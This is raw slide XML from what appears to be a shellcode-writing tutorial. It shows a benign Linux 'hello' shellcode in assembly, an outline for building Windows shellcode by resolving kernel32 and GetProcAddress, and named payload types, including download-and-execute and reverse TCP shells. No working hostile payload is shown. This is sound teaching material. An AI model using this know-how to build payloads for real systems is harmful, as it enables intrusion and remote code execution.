            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, 1       ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        ;get the address of the string from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        mov dl, 5       ;length of the string</a:t>
            </a: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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
          </a:p>
          <a:p>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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eax</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eax</a:t>
            </a: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mov al, 1       ;exit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a: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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ebx,ebx</a:t>
            </a:r>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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>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ender:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        call starter	;put the address of the string on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        db 'hello'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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457200"/>
            <a:ext cx="4876800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Windows shellcodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7315200" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find kernel32.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find GetProcAddress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find LoadLibrary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Load DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Call “random” functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Common shellcodes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>calc.exe (WinExec)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Download and execute (URLDownloadToFileA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MessageBox (user32.dll)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reverse TCP/Bind</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304800"/>
            <a:ext cx="5181600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Download and Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8458200" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" smtClean="0"/>
              <a:t>URLDownloadToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://msdn.microsoft.com/en-us/library/ie/ms775123(v=vs.85</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msdn.microsoft.com/en-us/library/windows/desktop/ms684175%28v=vs.85%29.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msdn.microsoft.com/en-us/library/windows/desktop/ms683212%28v=vs.85%29.aspx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3178076"/>
            <a:ext cx="3962400" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>HMODULE WINAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _In_  LPCTSTR lpFileName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>FARPROC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>WINAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _In_  HMODULE hModule,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _In_  LPCSTR lpProcName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="3183791"/>
            <a:ext cx="4343400" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>HRESULT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLDownloadToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  LPUNKNOWN pCaller,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  LPCTSTR szURL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  LPCTSTR szFileName,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _Reserved_  DWORD dwReserved,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  LPBINDSTATUSCALLBACK lpfnCB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>UINT WINAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _In_  LPCSTR lpCmdLine,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  _In_  UINT uCmdShow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45256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81400" y="420469"/>
            <a:ext cx="2209800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1219200"/>
            <a:ext cx="3733800" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>C/C++ compiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Running shellcodes (do not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Simple BOF example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" smtClean="0"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" smtClean="0"/>
              <a:t>limitations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ASM introduction</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Linux syscalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Linux shellcode example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910936" y="3429000"/>
            <a:ext cx="3505200" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Windows shellcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Disassemble shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Find kernel32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Find GetProcAddress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Find LoadLibrary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Load a DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Call functions from DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0"/>
              <a:t>Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
